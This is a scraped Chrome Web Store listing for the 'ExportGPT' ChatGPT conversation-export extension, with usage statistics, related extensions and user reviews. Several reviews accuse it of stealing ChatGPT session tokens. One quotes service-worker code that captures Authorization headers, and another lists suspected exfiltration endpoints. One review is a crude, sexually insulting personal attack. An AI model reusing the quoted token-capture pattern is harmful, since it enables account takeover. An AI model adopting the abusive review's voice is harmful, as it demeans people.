AI Exporter: Save ChatGPT, Gemini to PDF, Word, Markdown and Notion
Export ChatGPT, Claude, Gemini and NotebookLM chats to PDF/Word/Markdown/Txt. Supports content selection, and Notion sync, download.
All-in-one ChatGPT conversation export plugin, copy or export ChatGPT web page content, support multiple formats
按已采集快照查看用户数变化。
展示最近 7 日窗口内已采集的评分快照,辅助判断近期评分是否稳定。
同口径展示 1 天、7 天、30 天的绝对增长与增长率。
查看发布时间、版本、支持语言、最近更新和抓取时间。
查看插件说明、主要功能和适用场景。
📙 Feature Description
Quickly copy or export ChatGPT conversations from the sidebar button, download and save chat history with one click.
📋 Supported Export Formats
Export ChatGPT conversations to Markdown, screenshot, PDF, HTML, Excel, etc.
Go to the homepage to see all supported formats:
https://chatopenai.pro/exportgpt/
查看最近评论和评分分布。
商店综合星级:3.3。下方星级分布只统计已同步评论正文;如果某个插件只有公开分数、没有真实评论正文,这里可能为空。
查看 Chrome 商店详情页中的相关产品。
Export ChatGPT, Claude, Gemini and NotebookLM chats to PDF/Word/Markdown/Txt. Supports content selection, and Notion sync, download.
Download ChatGPT convos as PDF, Markdown, Text, etc. Download Chat GPT results to PDF. Easily convert ChatGPT to beautiful PDF.
Use chatgpt to pdf extension to save chatgpt as pdf, chat to pdf, and print. Export ChatGPT conversations to PDF easily.
A Chrome extension to bulk delete ChatGPT conversations
You can delete and archive ChatGPT, Claude, and Gemini chats all at once.
A Chrome extension to interact with ChatGPT for All Websites.
**Chrome Web Store Policy Violation Report: ExportGPT Extension** This extension contains credential-stealing malware that violates Chrome Web Store policies: 1. **Token theft**: Uses `chrome.webRequest.onBeforeSendHeaders` with `<all_urls>` permission to intercept and extract Authorization headers (Bearer tokens) from `https://chat.openai.com/backend-api/conversations` requests, enabling account takeover. 2. **Credential exposure**: Passes stolen tokens to its content script via `chrome.tabs.sendMessage`, where they are injected into the ChatGPT page DOM (`innerText`), making them accessible to any page script. 3. **Data exfiltration**: Performs scheduled silent uploads to external servers (`exportgpt.pro/api/me`, `chatopenai.pro/wp-json/custom/v1/member-info`) including user identifiers and session data with `credentials:"include"`. 4. **Policy violations**: - Requests excessive `<all_urls>` permissions not required for stated ChatGPT export functionality - Engages in covert credential harvesting without clear user consent or disclosure - Misleads users via denials in store responses despite observable malicious behavior This extension actively compromises user accounts and should be removed immediately for malware/phishing violations. (Reported under Chrome Web Store's Malware/Security Violations policy)
I've been using this extension for about a year and it's not working correctly lately. It's scrolling through my conversation, but it's not copying or sending the full text. There are chunks missing. And a lot of the text is garbled symbols. Please fix this!
Their latest update has destroyed how this exporter works. It no longer fully exports long conversations and it makes the user watch the extension scroll through the conversations without even finishing the scrolling. The Pro version works just as badly. It was working fine months ago, now no more.
good
导出markdown不全, 丢失了很多对话. 之前是没有这个问题的, 猜测和chatgpt最近更新的部分加载策略有关?
导出的markdown不全
Bitdefender reports ext as a Phishing credential stealing POS malware cancer virus and that the author has anal herpes as well as technically being a 40 y.o virgin and a small, limp kcoc with a rancid, permeating odour of inferiority and failure. Can't even launch his tihs malware without being detected before it can be in any way effective, just like his kcoc. F U C Also if Bitdefender is detecting this sht WHY ARE YOU SERVING IT FROM YOUR STORE CHROME? Do better losers.
great
I mean it worked but it's genuinely so suspicious that you shouldn't try it. If you want to download your chatgpt chats, look for other options. I was an idiot for downloading this onto my pc.
This is a virus. I analyzed the source code and right here in the service worker it send your authorization tokens to their website. This allows the extension publisher to log into your chatGPT account. chrome.webRequest.onBeforeSendHeaders.addListener(function (e) { if (e.url.includes("/backend-api/conversations")) { const s = e.requestHeaders; if (s.length > 0) { const e = s.find(e => "Authorization" === e.name); e && r({requestAccessToken: e.value}); } } }, {urls: ["<all_urls>"]}, ["requestHeaders"]) EDIT also I just realized its april fools, thats unfortunate, I'm not lying.